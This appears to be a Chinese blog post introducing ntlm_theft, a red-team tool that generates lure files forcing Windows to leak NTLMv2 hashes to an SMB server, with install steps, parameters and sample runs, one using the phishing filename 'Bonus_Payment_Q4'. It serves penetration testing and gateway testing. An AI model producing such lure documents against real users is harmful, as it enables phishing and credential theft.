关于ntlm_theft
ntlm_theft是一款基于Python 3开发的开源工具,可以生成21种不同类型的哈希窃取文档。该工具适用于网络钓鱼攻击,可以用于支持外网SMB流量和内部网络环境之中。与基于宏的文档或利用漏洞的文档相比,这些文件类型的好处在于,所有的这些文件都是使用“预期功能”构建的。
使用场景
ntlm_theft主要针对渗透测试人员和红队研究人员设计,可以帮助研究人员对目标公司员工进行内部网络钓鱼,或大规模测试防病毒和电子邮件网关的安全性。如果外网防火墙上允许出站SMB访问,则它也可用于外部网络钓鱼。
工具依赖
ntlm_theft基于Python 3开发,因此我们需要在本地环境安装并配置好Python 3环境,并安装好xlsxwriter:
pip3installxlsxwriter
工具下载
广大研究人员可以使用下列命令将该项目源码克隆至本地:
gitclonehttps://github.com/Greenwolf/ntlm_theft.git
工具参数
ntlm_theft的运行需要提供四个必要参数,一个输入格式,输入文件或目录,以及基础的运行模式:
- -g, –generate : 选择生成所有文件或指定文件类型
- -s, –server : SMB哈希捕捉服务器的IP地址
- -f, –filename : 不包含后缀的基础文件名,之后可以进行重命名
工具运行
下面给出的工具演示样例中,我们将使用ntlm_theft生成所有文件:
#python3ntlm_theft.py-gall-s127.0.0.1-ftest Created:test/test.scf(BROWSE) Created:test/test-(url).url(BROWSE) Created:test/test-(icon).url(BROWSE) Created:test/test.rtf(OPEN) Created:test/test-(stylesheet).xml(OPEN) Created:test/test-(fulldocx).xml(OPEN) Created:test/test.htm(OPENFROMDESKTOPWITHCHROME,IEOREDGE) Created:test/test-(includepicture).docx(OPEN) Created:test/test-(remotetempl*ate).docx(OPEN) Created:test/test-(frameset).docx(OPEN) Created:test/test.m3u(OPENINWINDOWSMEDIAPL*AYERONLY) Created:test/test.asx(OPEN) Created:test/test.jnlp(OPEN) Created:test/test.application(DOWNLOADANDOPEN) Created:test/test.pdf(OPENANDALLOW) Created:test/zoom-attack-instructions.txt(PASTETOCHAT) GenerationComplete.
在下面的工具使用样例中,我们将使用ntlm_theft仅生成现代文件:
#python3ntlm_theft.py-gmodern-s127.0.0.1-fmeeting SkippingSCFasitdoesnotworkonmodernWindows Created:meeting/meeting-(url).url(BROWSETOFOLDER) Created:meeting/meeting-(icon).url(BROWSETOFOLDER) Created:meeting/meeting.rtf(OPEN) Created:meeting/meeting-(stylesheet).xml(OPEN) Created:meeting/meeting-(fulldocx).xml(OPEN) Created:meeting/meeting.htm(OPENFROMDESKTOPWITHCHROME,IEOREDGE) Created:meeting/meeting-(includepicture).docx(OPEN) Created:meeting/meeting-(remotetempl*ate).docx(OPEN) Created:meeting/meeting-(frameset).docx(OPEN) Created:meeting/meeting-(externalcell).xlsx(OPEN) Created:meeting/meeting.m3u(OPENINWINDOWSMEDIAPL*AYERONLY) Created:meeting/meeting.asx(OPEN) Created:meeting/meeting.jnlp(OPEN) Created:meeting/meeting.application(DOWNLOADANDOPEN) Created:meeting/meeting.pdf(OPENANDALLOW) Skippingzoomasitdoesnotworkonthelatestversions SkippingAutorun.infasitdoesnotworkonmodernWindows Skippingdesktop.iniasitdoesnotworkonmodernWindows GenerationComplete.
在下面的工具使用样例中,我们将使用ntlm_theft仅生成一份xlsx文件:
#python3ntlm_theft.py-gxlsx-s192.168.1.103-fBonus_Payment_Q4 Created:Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx(OPEN) GenerationComplete.
工具运行截图
项目地址
ntlm_theft:【GitHub
转载请注明:IT运维空间 » 安全防护 » 如何使用ntlm_theft生成各种类型的NTLMv2哈希窃取文件
你可能喜欢:
-
解决MySql版本问题sql_mode=only_full_group_by
-
Python操作mysql数据库出现pymysql.err.ProgrammingError: (1064, “You have an error in your SQL syntax; check
-
Oracle PL/SQL如何动态调用存储过程 收藏
-
Mysql 不存在则插入,存在则更新 mysql 存在该记录则更新,不存在则插入记录的sql
-
MySQL与Oracle之间互相拷贝数据的Java程序
-
MySQL导入sql文件的三种方法小结
-
MS sql server和mysql中update多条数据的例子
-
mysql防SQL注入搜集
-
Oracle:SQL语句–给用户赋权限
-
如何在MySql中记录SQL日志(例如Sql Server Profiler)
发表评论